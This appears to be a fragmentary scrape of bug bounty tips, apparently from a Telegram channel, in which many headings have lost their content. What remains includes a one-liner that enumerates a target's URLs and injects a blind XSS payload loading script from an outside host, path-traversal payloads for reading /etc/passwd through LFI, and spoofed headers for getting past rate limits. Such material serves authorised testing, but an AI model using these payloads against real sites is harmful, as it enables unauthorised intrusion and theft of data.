One Liner To Find Blind XSS
Blind XSS in Parameters

subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters

Checklist; After Recon

Rate Limit Bypass Headers

Pentesting Webapp Checklist for Small scope !

Authentication Testing

Use this payloads on Email field...

👉🏻 https://t.me/bug_bounty_bootcamp

Bug Bounty Tips

Sensitive Data Exposure
in ASP•NET apps via /Trace.axd endpoint

Upload functionality testing

Some filter bypass payload list while hunting for LFi vulnerability


→index.php?page=....//....//etc/passwd
→index.php?page=..///////..////..//////etc/passwd
→index.php?page=/var/www/../../etc/passwd

Pentesting Mindmap

LFI Parameters

If you need to intercept the Android traffic through BurpSuite:
1)Ensure Burp is listening to more than the loopback address
2)Allow inbound traffic on the Firewall
3)Use ADB to run "settings put global http_proxy IP PORT"
4)Download and trust the CA from http://IP/cert
5)WIN

Remote File Inclusion (RFI)

HTTP Status Codes

Rate limit bypass using some custom headers:

X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP

403 bypass techniques